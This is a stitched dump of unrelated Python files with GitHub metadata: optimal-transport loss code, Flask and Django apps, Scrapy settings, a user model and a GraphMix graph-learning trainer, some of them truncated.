| 2020-03-21T03:29:34.655671 | 2018-05-26T18:53:54 | 2018-05-26T18:53:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,783 |
py
|
import torch as th
from reversible.gaussian import get_gauss_samples
from reversible.util import log_sum_exp, ensure_on_same_device, var_to_np
def sinkhorn_to_gauss_dist(outs, mean, std, **kwargs):
gauss_samples = get_gauss_samples(len(outs), mean, std)
return sinkhorn_sample_loss(outs, gauss_samples, **kwargs)
def M(u, v, C, epsilon):
"Modified cost for logarithmic updates"
"$M_{ij} = (-c_{ij} + u_i + v_j) / \epsilon$"
return (-C + u.unsqueeze(1) + v.unsqueeze(0)) / epsilon
def sinkhorn_sample_loss(samples_a, samples_b, epsilon=0.01, stop_threshold=0.1,
max_iters=50, normalize_cost_matrix=False, max_normed_entropy=None,
normalize_by_empirical_std_a=False):
assert normalize_cost_matrix in [False, 'mean', 'max']
diffs = samples_a.unsqueeze(1) - samples_b.unsqueeze(0)
if normalize_by_empirical_std_a:
stds = th.std(samples_a.detach(), dim=0, keepdim=True)
stds = th.clamp(stds, min=1e-5)
diffs = diffs / stds
C = th.sum(diffs * diffs, dim=2)
del diffs
C_nograd = C.detach()
if normalize_cost_matrix == 'mean':
C_nograd = C_nograd / th.mean(C_nograd)
elif normalize_cost_matrix == 'max':
C_nograd = C_nograd / th.max(C_nograd)
if max_normed_entropy is None:
estimated_trans_th = estimate_transport_matrix_sinkhorn(
C_nograd, epsilon=epsilon, stop_threshold=stop_threshold,
max_iters=max_iters)
else:
estimated_trans_th, _ = transport_mat_sinkhorn_below_entropy(
C_nograd, start_eps=epsilon, stop_threshold=stop_threshold,
max_iters_sinkhorn=max_iters, max_iters_for_entropy=10,
max_normed_entropy=max_normed_entropy)
cost = th.sqrt(th.sum(estimated_trans_th * C)) # Sinkhorn cost
return cost
def transport_mat_sinkhorn_below_entropy(
C, start_eps, max_normed_entropy, max_iters_for_entropy,
max_iters_sinkhorn=50, stop_threshold=1e-3):
normed_entropy = max_normed_entropy + 1
iteration = 0
cur_eps = start_eps
while (normed_entropy > max_normed_entropy) and (iteration < max_iters_for_entropy):
transport_mat = estimate_transport_matrix_sinkhorn(
C, epsilon=cur_eps, stop_threshold=stop_threshold, max_iters=max_iters_sinkhorn)
relevant_mat = transport_mat[transport_mat > 0]
normed_entropy = -th.sum(relevant_mat * th.log(relevant_mat)) / np.log(transport_mat.numel() * 1.)
normed_entropy = var_to_np(normed_entropy)
iteration += 1
cur_eps = cur_eps / 2
return transport_mat, cur_eps
def estimate_transport_matrix_sinkhorn(C, epsilon=0.01, stop_threshold=0.1,
max_iters=50):
n1 = C.size()[0]
n2 = C.size()[1]
mu = th.autograd.Variable(1. / n1 * th.FloatTensor(n1).fill_(1),
requires_grad=False)
nu = th.autograd.Variable(1. / n2 * th.FloatTensor(n2).fill_(1),
requires_grad=False)
mu, nu, C = ensure_on_same_device(mu, nu, C)
u, v, err = 0. * mu, 0. * nu, 0.
actual_nits = 0 # to check if algorithm terminates because of threshold or max iterations reached
for i in range(max_iters):
u1 = u # useful to check the update
u = epsilon * (
th.log(mu) - log_sum_exp(M(u, v, C, epsilon), dim=1, keepdim=True).squeeze()) + u
v = epsilon * (
th.log(nu) - log_sum_exp(M(u, v, C, epsilon).t(), dim=1, keepdim=True).squeeze()) + v
err = (u - u1).abs().sum()
actual_nits += 1
if var_to_np(err < stop_threshold).all():
break
estimated_transport_matrix = th.exp(M(u, v, C, epsilon))
return estimated_transport_matrix
|
[
"[email protected]"
] | |
89f7995781d60bb6ec3ed228079f873bf72f7ce1
|
f47df27f960b3c5abebf16145026d20fc81f062b
|
/dheeranet/views/home.py
|
9d2568894366f760bc5e482240240503dcf65e9a
|
[] |
no_license
|
dheera/web-dheeranet
|
34eec0591872d01afd441ce97a4853c95fde18a8
|
1faceb4d54d91ae1b7ee3f7e449ee3f224600b08
|
refs/heads/master
| 2021-01-22T06:32:12.403454 | 2017-04-10T20:55:33 | 2017-04-10T20:55:33 | 20,196,792 | 5 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 487 |
py
|
from flask import Blueprint, render_template, abort, request
from jinja2 import TemplateNotFound
from dheeranet import static_bucket
from dheeranet.cache import s3_get_cached
import json, datetime
home = Blueprint('home', __name__,template_folder='../template')
@home.route('/')
def show():
home_items = json.loads(s3_get_cached(static_bucket, '__home__'))
news_items = filter(lambda x:x['type']=='news', home_items)
return render_template('home.html', news_items = news_items)
|
[
"[email protected]"
] | |
c2ad9a49e4e23ffa98d960a2818b4175b1dece93
|
b5029b5710f72010690c5e57fe5c045dcff2701c
|
/books_authors_app/migrations/0001_initial.py
|
9f233b82732ee72e3c171a7a7c24c182c0d25b6d
|
[] |
no_license
|
Jallnutt1/first_django_project
|
2d059ed815227cf5c72af67e4e4074e95edf1508
|
200b98623292e806a407badf1cb9311e25bd561d
|
refs/heads/main
| 2023-04-04T00:50:19.183891 | 2021-04-13T18:56:03 | 2021-04-13T18:56:03 | 357,659,099 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,166 |
py
|
# Generated by Django 2.2 on 2021-04-09 00:55
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Books',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('desc', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"{ID}+{username}@users.noreply.github.com"
] |
{ID}+{username}@users.noreply.github.com
|
d0fa78d37064bf03251c9c6edf18a378195106d5
|
6196bd8f9226042b4c8e171313e273d1875c3ee4
|
/up_down_chain/up_down_chain/app/Subseribe/migrations/0002_bidsusersetting_mid.py
|
d2f23630662918aa99b11057208f625ad32ce97c
|
[] |
no_license
|
wang18722/Up_down_chain
|
87230f057dadea95ab8b2760ca756afe00675b26
|
3c18d5d5727db1562438edea66ef15f54b378e33
|
refs/heads/master
| 2022-12-27T09:04:49.976753 | 2019-07-01T01:19:12 | 2019-07-01T01:19:12 | 225,579,284 | 0 | 0 | null | 2022-12-08T01:23:21 | 2019-12-03T09:22:22 |
Python
|
UTF-8
|
Python
| false | false | 694 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-06-24 05:29
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Subseribe', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='bidsusersetting',
name='mid',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='用户'),
),
]
|
[
"[email protected]"
] | |
2ab9c6aae658796991d04ae8393361738813a7fb
|
b6233af6a39e7ab500743d6b2ac7d52f68ae3be2
|
/15/00/2.py
|
b738c43f76091d7e37910b5e9ab030f6c459d903
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201712
|
9754526e1d8f1c0519fcce98bc7df803f456cc4e
|
f18f1251074729c4a3865b113edc89ec06b54130
|
refs/heads/master
| 2021-09-02T06:08:08.278115 | 2017-12-30T23:04:55 | 2017-12-30T23:04:55 | 112,670,974 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 149 |
py
|
import socket, array
def send_fds(sock, msg, fds):
return sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])
|
[
"[email protected]"
] | |
2245d137d3c96c0d0184ca4ce3a2b2930945227a
|
e0980f704a573894350e285f66f4cf390837238e
|
/.history/news/models_20201124125236.py
|
70a66f359a9f8e8b4fff11e3efb6146fd18c69f7
|
[] |
no_license
|
rucpata/WagtailWebsite
|
28008474ec779d12ef43bceb61827168274a8b61
|
5aa44f51592f49c9a708fc5515ad877c6a29dfd9
|
refs/heads/main
| 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 160 |
py
|
from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
te
|
[
"[email protected]"
] | |
d85e0b393ae8d8ee90e85e1f7704da446a52d993
|
5e9eba022385185a2c84d60fffe6cdf04421ed1b
|
/academicos/views.py
|
e44f4be6e8ae947cd6a615b5209a4e6d14064e29
|
[] |
no_license
|
lizceth/proyecto-eventos
|
4a6de50ee7ae7705fb7a81cb4fdbdbe2c9ed9516
|
b408149a463d130da72bb555237814cc5bb2dbfa
|
refs/heads/master
| 2020-06-02T18:21:08.415503 | 2014-10-14T22:35:26 | 2014-10-14T22:35:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,361 |
py
|
from django.contrib.auth.models import User
from django.shortcuts import render, render_to_response, get_object_or_404
from academicos.models import Coordinador, Escuela, Facultad
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from asistentes.models import Persona
from asistentes.forms import *
#from django.core.mail import EmailMessage
#from django.contrib.auth.forms import UserCreationForm, AuthentificationForm
#from django.contrib.auth import login, authentificate, logout
#from django.contrib.auth.decorators import login_required
from academicos.forms import CoordinadorForm, EscuelaForm, FacultadForm
def Cordinadores(request):
cordinadores = Coordinador.objects.all()
titulo = "Lista de Cordinadores"
return render_to_response('academicos/cordinadoresList.html',{
'cordinadores':cordinadores,'titulo':titulo},
context_instance=RequestContext(request))
def Cordinador_add(request):
if request.method == "POST":
formulario = CoordinadorForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/cordinadoresList/')
else:
formulario = CoordinadorForm()
return render_to_response('academicos/cordinadoresAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_edit (request, id):
cordinador_edit= Coordinador.objects.get(pk=id)
if request.method == 'POST':
formulario = CoordinadorForm(
request.POST, instance = cordinador_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/cordinadoresList/")
else:
formulario = CoordinadorForm(instance= cordinador_edit)
return render_to_response('academicos/cordinadoresEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_borrar (request, id):
cordinador_borrar = get_object_or_404(Coordinador, pk=id)
cordinador_borrar.delete()
return HttpResponseRedirect("/cordinadoresList/")
def Escuelas(request):
escuelas = Escuela.objects.all()
titulo = "Lista de Escuelas"
return render_to_response('academicos/escuelasList.html',
{'escuelas':escuelas,'titulo':titulo},
context_instance=RequestContext(request))
def Escuela_add (request):
if request.method == "POST":
formulario = EscuelaForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/escuelaList/')
else:
formulario = EscuelaForm()
return render_to_response('academicos/escuelasAdd.html',
{'formulario':formulario},
context_instance=RequestContext(request))
def Escuela_edit (request, id):
escuela_edit= Escuela.objects.get(pk=id)
if request.method == 'POST':
formulario = EscuelaForm(
request.POST, instance = escuela_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/escuelaList/")
else:
formulario = EscuelaForm(instance= escuela_edit)
return render_to_response('academicos/escuelasEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Escuelas_borrar (request, id):
escuelas_borrar = get_object_or_404(Escuela, pk=id)
escuelas_borrar.delete()
return HttpResponseRedirect("/escuelaList/")
def Facultades(request):
facultades = Facultad.objects.all()
titulo = "Lista de Facultades"
return render_to_response('academicos/facultadList.html',{
'facultades':facultades,'titulo':titulo},
context_instance=RequestContext(request))
def Facultad_add(request):
if request.method == "POST":
formulario = FacultadForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/facultadesList/')
else:
formulario = FacultadForm()
return render_to_response('academicos/facultadAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_edit (request, id):
facultad_edit= Facultad.objects.get(pk=id)
if request.method == 'POST':
formulario = FacultadForm(
request.POST, instance = facultad_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/facultadesList/")
else:
formulario = FacultadForm(instance= facultad_edit)
return render_to_response('academicos/facultadEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_borrar (request, id):
facultad_borrar = get_object_or_404(Facultad, pk=id)
facultad_borrar.delete()
return HttpResponseRedirect("/facultadesList/")
|
[
"[email protected]"
] | |
c5d9cf121b69761030d0050d73f56d251f3b3b8d
|
a57eb85856cc93a389b815276765a06019d6f8d4
|
/manage.py
|
a187e1a5e09bc71ad51ec80483e4c11d9cced0d9
|
[
"MIT"
] |
permissive
|
astrofrog/multistatus
|
205f6ad9a06995bc4b418f6d0de222c4dacfcb79
|
f63042c9e85cb4e58e3768a65f4684be07e432d1
|
refs/heads/master
| 2021-01-10T21:05:40.370555 | 2014-12-09T10:24:48 | 2014-12-09T10:24:48 | 22,805,918 | 0 | 1 | null | 2014-12-09T10:23:13 | 2014-08-10T09:39:38 |
Python
|
UTF-8
|
Python
| false | false | 257 |
py
|
#!/usr/bin/env python3.4
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "multistatus.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"[email protected]"
] | |
10d541866288a328b07bc1a9602e1afcbb87583f
|
994461efa08e71403b2a1c0598391fddf3b44b87
|
/june-leetcoding-challenge/d5-random-pick-with-weight.py
|
65d47a61d6766e106ff6b66178910de5a81e3489
|
[] |
no_license
|
pkdism/leetcode
|
26f16f9211ddfdef8e0fe74c9268e6a48da64717
|
589652ae727331d1f962d22a020fc6ae09bfcea4
|
refs/heads/master
| 2020-12-11T15:48:01.116731 | 2020-08-16T18:31:03 | 2020-08-16T18:31:03 | 233,889,125 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 947 |
py
|
"""
Given an array w of positive integers,
where w[i] describes the weight of index i,
write a function pickIndex which randomly picks an index in proportion to its weight.
"""
import random
class Solution:
def __init__(self, w: List[int]):
self.w = w
self.n = len(self.w)
self.arr = []
self.curr = 0
for x in w:
self.curr += x
self.arr.append(self.curr)
def pickIndex(self) -> int:
# print(self.arr)
n = len(self.arr)
r = random.randrange(1, self.arr[-1] + 1)
l = 0
h = n-1
while l < h:
m = (l+h)//2
# if self.arr[m] == r:
# return m
if self.arr[m] < r:
l = m + 1
else:
h = m
return l
# Your Solution object will be instantiated and called as such:
# obj = Solution(w)
# param_1 = obj.pickIndex()
|
[
"[email protected]"
] | |
488eedf2868298347e8fd761a86a7501687b5a22
|
cc6e8b20a64940f2ad83be6a03134e8b105514e7
|
/webviz/viz/migrations/0001_initial.py
|
71fcb033e7e32232e310b0dfc022cfe73f08c521
|
[
"MIT"
] |
permissive
|
JagritiG/django-webviz
|
50654c4fe76b1653f64e404c45d674d5d179e236
|
213489bb3a70019ca9cff5d127fd6d0c06bc61d6
|
refs/heads/main
| 2023-04-27T01:21:04.195996 | 2021-05-16T22:30:04 | 2021-05-16T22:30:04 | 353,126,658 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 552 |
py
|
# Generated by Django 3.1.7 on 2021-03-30 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Csv',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('csv', models.FileField(upload_to='media/csvs/')),
],
),
]
|
[
"[email protected]"
] | |
f197241de30622889b167ecb7dc068406820dbc8
|
6061ebee9fbce8eb5b48ed7ccd2aecb196156598
|
/modulo07-funcoes/exercicios/exercicio04.py
|
5ebbfcd3edf545e7ffdc636929ca0276708ef06c
|
[] |
no_license
|
DarioCampagnaCoutinho/logica-programacao-python
|
fdc64871849bea5f5bbf2c342db5fda15778110b
|
b494bb6ef226c89f4bcfc66f964987046aba692d
|
refs/heads/master
| 2023-02-24T11:45:29.551278 | 2021-01-26T22:02:49 | 2021-01-26T22:02:49 | 271,899,650 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 141 |
py
|
def aumento(numero, valor):
resultado = numero * valor / 100
return resultado + numero
resultado = aumento(100, 50)
print(resultado)
|
[
"[email protected]"
] | |
b936c098695eb03ec4c9abb82e78537b33edc5f3
|
b7a2a80843fa5141ffb9c7b4439f1d2ac713af30
|
/UT2_Morsen.py
|
f0f71ad6765a17297467d402ad1566da64d52c4e
|
[] |
no_license
|
wunnox/python_grundlagen
|
df1bc2b9b1b561bd6733ccc25305e799a48e714e
|
fa84d7aae7332a7acbb3ba7ff0fe2216cc345fc0
|
refs/heads/master
| 2023-05-01T12:19:23.208445 | 2023-04-16T11:29:01 | 2023-04-16T11:29:01 | 222,099,539 | 2 | 3 | null | 2019-12-19T10:56:43 | 2019-11-16T12:57:54 |
Python
|
UTF-8
|
Python
| false | false | 450 |
py
|
#!/usr/local/bin/python3
####################################################
#
# Uebung UT2_Morsen.py:
# Erstellen Sie ein Programm, welches anhand einer
# Morsetabelle einen Text in Morsecode ausgibt.
# Verwenden Sie hierzu das Modul UT2_Morsecodes.py
#
####################################################
import UT2_Morsecodes as mc
w = input('-> ') # Wort einlesen
w = w.replace(' ', '_')
for l in w:
print(mc.morse(l), end=' ')
print()
|
[
"[email protected]"
] | |
1c3ea9c37220f04f5ec059b8d964947f7d2508f6
|
c31e69b763e1b52d3cefa4f5a49432ae966f22d0
|
/day29/mySpider/mySpider/settings.py
|
4e3e3faf4c4eeff43f7ccf6f99bfd3381a22506f
|
[] |
no_license
|
lvah/201901python
|
cbda174a3c97bc5a2f732c8e16fc7cf8451522d2
|
7bffe04a846f2df6344141f576820730a7bbfa6a
|
refs/heads/master
| 2022-12-13T09:49:29.631719 | 2019-04-06T09:48:33 | 2019-04-06T09:48:33 | 165,477,671 | 3 | 0 | null | 2022-12-08T04:57:01 | 2019-01-13T07:23:44 |
HTML
|
UTF-8
|
Python
| false | false | 3,413 |
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for mySpider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'mySpider'
SPIDER_MODULES = ['mySpider.spiders']
NEWSPIDER_MODULE = 'mySpider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'mySpider (+http://www.yourdomain.com)'
# Obey robots.txt rules
# ROBOTSTXT_OBEY = True
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
MOOCFilename = "mooc.txt"
ITEM_PIPELINES = {
# 管道的位置: 优先级, 0~1000, 数字越小, 优先级越高;
'mySpider.pipelines.MyspiderPipeline': 300,
'mySpider.pipelines.CsvPipeline': 400,
'mySpider.pipelines.MysqlPipeline': 500,
'mySpider.pipelines.ImagePipeline': 200,
}
IMAGES_STORE = '/root/PycharmProjects/day29/mySpider/img'
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
f8bf11e12bc1581ed30ac99f941e2bf0f33f766b
|
80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019
|
/data/HackerRank-ProblemSolving/Counting Valleys.py
|
8dd7bd82fe261f99bf7584a8856d457b1d55009b
|
[] |
no_license
|
Ritvik19/CodeBook
|
ef7764d89b790e902ede5802f36d5ca910d8a50e
|
2b4ed7938bbf156553d6ba5cba6216449528f0fc
|
refs/heads/master
| 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 523 |
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
def countingValleys(n, s):
count = 0
topography = 0
for _ in s:
if _ == 'D':
topography -= 1
else:
topography += 1
if topography == 0:
count += 1
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
s = input()
result = countingValleys(n, s)
fptr.write(str(result) + '\n')
fptr.close()
|
[
"[email protected]"
] | |
ffd754dfcd3f8ce81ed63d9d1957b3c012840687
|
f63d8037abd95550bbf19820bbbf63fe004ea027
|
/apps/auth/models.py
|
e887c3348f0f68c9ec65dc5781584c4c4638ab2f
|
[] |
no_license
|
lsdlab/flask_socketio_celery
|
6595e0fdc6534e4c3988b2e895194ba6f2302c53
|
84870110641feb8e49d9f45271894a66e202b7ec
|
refs/heads/master
| 2020-03-24T20:54:47.793077 | 2018-08-01T04:33:54 | 2018-08-01T04:33:54 | 143,003,268 | 0 | 1 | null | 2018-08-24T01:54:32 | 2018-07-31T11:08:36 |
Python
|
UTF-8
|
Python
| false | false | 2,521 |
py
|
import datetime as dt
from flask_login import UserMixin
from apps.database import (Column, Model, SurrogatePK, db,
reference_col, relationship)
from apps.extensions import bcrypt
class Role(SurrogatePK, Model):
"""A role for a user."""
__tablename__ = 'auth_roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('auth_users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""A user of the app."""
__tablename__ = 'auth_users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=True)
#: The hashed password
password = Column(db.Binary(128), nullable=False)
created_at = Column(db.DateTime, nullable=False, default=dt.datetime.now)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
sid = Column(db.String(80), nullable=True, default='')
def __init__(self, username, password=None, **kwargs):
"""Create instance."""
db.Model.__init__(self, username=username, **kwargs)
if password:
self.set_password(password)
else:
self.password = None
def set_password(self, password):
"""Set password."""
self.password = bcrypt.generate_password_hash(password)
def check_password(self, value):
"""Check password."""
return bcrypt.check_password_hash(self.password, value)
@property
def full_name(self):
"""Full user name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
def to_json(self):
return {
'id': self.id,
'username': self.username,
'email': self.email,
'active': self.active,
'is_admin': self.is_admin,
'sid': self.sid,
'created_at': self.created_at.strftime("%Y-%m-%d %H:%M:%S")
}
|
[
"[email protected]"
] | |
89588f1507285e3312add597434439152e7280fa
|
7a3696072a511acc4974bb76004b315a35a106b7
|
/SS-GCNs/SS-GMNN-GraphMix/GraphMix-clu/trainer.py
|
0a339f94160ac998022247c886c38f0cec71a1bd
|
[
"MIT"
] |
permissive
|
xyh97/graph_representation
|
859e9f2ff911058db251fd6547098968960c6739
|
e6967073a951cd029651389d4b76606f9cef7f6c
|
refs/heads/main
| 2023-03-23T00:55:52.763740 | 2021-03-19T17:15:40 | 2021-03-19T17:15:40 | 343,223,074 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,909 |
py
|
import math
import random
import numpy as np
import torch
from torch import nn
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
from torch.optim import Optimizer
bce_loss = nn.BCELoss().cuda()
softmax = nn.Softmax(dim=1).cuda()
class_criterion = nn.CrossEntropyLoss().cuda()
def mixup_criterion(y_a, y_b, lam):
return lambda criterion, pred: lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
def get_optimizer(name, parameters, lr, weight_decay=0):
if name == 'sgd':
return torch.optim.SGD(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'rmsprop':
return torch.optim.RMSprop(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adagrad':
return torch.optim.Adagrad(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adam':
return torch.optim.Adam(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adamax':
return torch.optim.Adamax(parameters, lr=lr, weight_decay=weight_decay)
else:
raise Exception("Unsupported optimizer: {}".format(name))
def change_lr(optimizer, new_lr):
for param_group in optimizer.param_groups:
param_group['lr'] = new_lr
class Trainer(object):
def __init__(self, opt, model, partition_labels, ema= True):
partition_num = partition_labels.max() + 1
self.partition_labels = partition_labels.cuda()
self.task_ratio = opt['task_ratio']
self.loss_func = nn.CrossEntropyLoss()
self.opt = opt
self.ema = ema
self.model = model
self.criterion = nn.CrossEntropyLoss()
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
self.ss_classifier = nn.Linear(opt['hidden_dim'], partition_num, bias=False)
if opt['cuda']:
self.criterion.cuda()
self.ss_classifier.cuda()
self.parameters.append(self.ss_classifier.weight)
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def reset(self):
self.model.reset()
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def update(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.train()
self.optimizer.zero_grad()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
loss.backward()
self.optimizer.step()
return loss.item()
def update_soft(self, inputs, target, idx, idx_u):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
logits= self.model(inputs)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
return loss, loss0
def update_soft_aux(self, inputs, target,target_discrete, idx, idx_unlabeled, adj, opt, mixup_layer, idx_u):
"""uses the auxiliary loss as well, which does not use the adjacency information"""
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
idx_unlabeled = idx_unlabeled.cuda()
self.model.train()
self.optimizer.zero_grad()
mixup = True
if mixup == True:
# get the supervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix=mixup_layer)
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
mixed_target = lam*target_a + (1-lam)*target_b
loss = bce_loss(softmax(logits[idx]), mixed_target)
# get the unsupervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx_unlabeled, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix= mixup_layer)
mixed_target = lam*target_a + (1-lam)*target_b
loss_usup = bce_loss(softmax(logits[idx_unlabeled]), mixed_target)
else:
logits = self.model.forward_aux(inputs, target=None, train_idx= idx, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
'''
